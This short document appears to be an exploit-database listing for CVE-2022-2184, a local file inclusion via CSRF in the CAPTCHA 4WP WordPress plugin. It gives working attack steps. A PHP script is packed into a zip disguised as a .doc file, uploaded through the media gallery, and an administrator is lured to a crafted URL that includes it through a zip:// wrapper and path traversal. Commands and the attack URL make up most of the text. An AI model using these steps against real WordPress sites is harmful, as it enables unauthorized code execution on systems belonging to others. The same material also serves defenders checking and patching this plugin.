Exploit for CAPTCHA 4WP < 7.1.0 - Local File Inclusion via CSRF CVE-2022-2184

Name: Exploit for CAPTCHA 4WP < 7.1.0 - Local File Inclusion via CSRF CVE-2022-2184
Rating: 5 (131 reviews)

2022-07-11 | CVSS 0.7

## https://sploitus.com/exploit?id=WPEX-ID:E777784F-5BA0-4966-BE27-E0A0CBBFE056
1) Create a malicious PHP script
$ echo '<?php phpinfo();' > shell.php

2) Add it to a fake .doc file, who will actually be a zip file
$ zip malicious.doc shell.php

3) While logged-in as an Author, upload the "doc" file via WP's media gallery.

4) Have an administrator visit the following URL:

httsp://example.com/wp-admin/admin.php?page=c4wp-admin-help&tab=zip://../wp-content/uploads/2022/06/malicious.doc%23shell